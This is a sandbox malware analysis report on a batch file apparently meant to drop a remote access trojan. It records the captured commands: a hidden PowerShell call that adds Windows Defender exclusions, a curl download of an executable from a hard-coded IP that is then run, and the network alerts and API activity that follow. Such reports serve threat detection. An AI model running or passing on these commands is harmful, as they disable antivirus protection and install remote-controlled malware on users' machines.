Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 20, 2023, 9:34 a.m.	June 20, 2023, 9:37 a.m.

Size	345.0B
Type	DOS batch file, ASCII text, with CRLF line terminators
MD5	`195ea5d64645f606cc382a43e1a5023c`
SHA256	`273b7078c3fe99f068ee222303ba5b70e291c0092096bec179b46ad937c1eaca`
CRC32	`A2A98A93`
ssdeep	`6:hSG81R3KnMMQ75ieGgdEYluWHp2IeR3pOHCvWWJzRDaHvQ+OvGCbFHKyB/nz:0G81kMMQ7hu+THJeRECOWJzR0OeaFqyN`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "OTwXHnJr" "C:\Users\test22\AppData\Local\Temp\exclusion and run rat.bat"
3000
- cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\exclusion and run rat.bat"
  792
  - powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\'"
    1376
  - timeout.exe timeout /t 8
    2352
  - curl.exe curl -o "C:\Users\Public\Videos\bz.exe" "http://51.79.49.73/crc/bz.exe"
    1688
  - bz.exe "C:\Users\Public\Videos\bz.exe"
    2244
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
      1844
    - Play.exe C:\Users\Public\Videos\Play.exe
      2112

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
51.79.49.73	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49171 -> 51.79.49.73:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.102:49171 -> 51.79.49.73:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 51.79.49.73:80 -> 192.168.56.102:49171	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 51.79.49.73:80 -> 192.168.56.102:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 51.79.49.73:80 -> 192.168.56.102:49171	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 51.79.49.73:80 -> 192.168.56.102:49171	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.102:49168 -> 51.79.49.73:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.102:49168 -> 51.79.49.73:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.102:49168 -> 51.79.49.73:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.102:49168 -> 51.79.49.73:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic
TCP 51.79.49.73:80 -> 192.168.56.102:49168	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 51.79.49.73:80 -> 192.168.56.102:49168	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 20, 2023, 9:34 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 20, 2023, 9:34 a.m.			0	0
IsDebuggerPresent June 20, 2023, 9:34 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW June 20, 2023, 9:34 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1	0

Uses Windows APIs to generate a cryptographic key (50 out of 88 events)

Time & API	Arguments	Status	Return
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b81a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b81a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b81a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b81a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b81a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b81a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061a400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061aa80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061aa80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061aa80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061a540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 20, 2023, 9:34 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061a540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 20, 2023, 9:34 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ June 20, 2023, 9:34 a.m.	stacktrace: gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75736d3a GetClientRect+0xc5 CallWindowProcW-0xb user32+0x20d27 @ 0x75740d27 CallWindowProcA+0x1b GetClassNameA-0x95 user32+0x2794a @ 0x7574794a play+0x1b173 @ 0x41b173 play+0x1a7a0 @ 0x41a7a0 play+0x1b3d6 @ 0x41b3d6 IID_IVbaHost+0x236f3 UserDllMain-0x41bc4 msvbvm60+0x51d33 @ 0x72991d33 play+0x14834 @ 0x414834 IID_IVbaHost+0x239f4 UserDllMain-0x418c3 msvbvm60+0x52034 @ 0x72992034 IID_IVbaHost+0x23e5b UserDllMain-0x4145c msvbvm60+0x5249b @ 0x7299249b IID_IVbaHost+0x24027 UserDllMain-0x41290 msvbvm60+0x52667 @ 0x72992667 IID_IVbaHost+0x3b77 UserDllMain-0x61740 msvbvm60+0x321b7 @ 0x729721b7 IID_IVbaHost+0x386d UserDllMain-0x61a4a msvbvm60+0x31ead @ 0x72971ead IID_IVbaHost+0x36291 UserDllMain-0x2f026 msvbvm60+0x648d1 @ 0x729a48d1 IID_IVbaHost+0x418d8 UserDllMain-0x239df msvbvm60+0x6ff18 @ 0x729aff18 BASIC_CLASS_Release+0xfcaa IID_IVbaHost-0xff3d msvbvm60+0x1e703 @ 0x7295e703 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 play+0x16d6 @ 0x4016d6 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: 0f b7 46 14 89 55 fc 89 55 cc 89 45 c8 39 96 a0 exception.instruction: movzx eax, word ptr [esi + 0x14] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x3e993ee registers.esp: 1635324 registers.edi: 0 registers.eax: 0 registers.ebp: 1636396 registers.edx: 0 registers.ebx: 1961295872 registers.esi: 1053245354 registers.ecx: 56229960	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

June 20, 2023, 9:34 a.m.

stacktrace:

gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75736d3a
GetClientRect+0xc5 CallWindowProcW-0xb user32+0x20d27 @ 0x75740d27
CallWindowProcA+0x1b GetClassNameA-0x95 user32+0x2794a @ 0x7574794a
play+0x1b173 @ 0x41b173
play+0x1a7a0 @ 0x41a7a0
play+0x1b3d6 @ 0x41b3d6
IID_IVbaHost+0x236f3 UserDllMain-0x41bc4 msvbvm60+0x51d33 @ 0x72991d33
play+0x14834 @ 0x414834
IID_IVbaHost+0x239f4 UserDllMain-0x418c3 msvbvm60+0x52034 @ 0x72992034
IID_IVbaHost+0x23e5b UserDllMain-0x4145c msvbvm60+0x5249b @ 0x7299249b
IID_IVbaHost+0x24027 UserDllMain-0x41290 msvbvm60+0x52667 @ 0x72992667
IID_IVbaHost+0x3b77 UserDllMain-0x61740 msvbvm60+0x321b7 @ 0x729721b7
IID_IVbaHost+0x386d UserDllMain-0x61a4a msvbvm60+0x31ead @ 0x72971ead
IID_IVbaHost+0x36291 UserDllMain-0x2f026 msvbvm60+0x648d1 @ 0x729a48d1
IID_IVbaHost+0x418d8 UserDllMain-0x239df msvbvm60+0x6ff18 @ 0x729aff18
BASIC_CLASS_Release+0xfcaa IID_IVbaHost-0xff3d msvbvm60+0x1e703 @ 0x7295e703
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
play+0x16d6 @ 0x4016d6
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: 0f b7 46 14 89 55 fc 89 55 cc 89 45 c8 39 96 a0
exception.instruction: movzx eax, word ptr [esi + 0x14]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x3e993ee
registers.esp: 1635324
registers.edi: 0
registers.eax: 0
registers.ebp: 1636396
registers.edx: 0
registers.ebx: 1961295872
registers.esi: 1053245354
registers.ecx: 56229960

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://51.79.49.73/crc/bz.exe
suspicious_features	Connection to IP address				suspicious_request	GET http://51.79.49.73/crc/Play.exe

Performs some HTTP requests (2 events)

request	GET http://51.79.49.73/crc/bz.exe
request	GET http://51.79.49.73/crc/Play.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 299 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73961000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73962000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f27000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 20, 2023, 9:34 a.m.	process_identifier: 1376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
